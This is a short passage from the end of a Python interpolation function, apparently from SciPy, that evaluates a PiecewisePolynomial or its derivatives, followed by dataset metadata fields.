if you repeatedly evaluate the same polynomial, consider using the class
PiecewisePolynomial (which is what this function does).
"""
P = PiecewisePolynomial(xi, yi, orders, axis=axis)
if der == 0:
return P(x)
elif _isscalar(der):
return P.derivative(x,der=der)
else:
return P.derivatives(x,der=np.amax(der)+1)[der]
|
bsd-3-clause
| -1,840,114,695,129,729,800
| 33.621651
| 148
| 0.588354
| false
| 3.916343
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.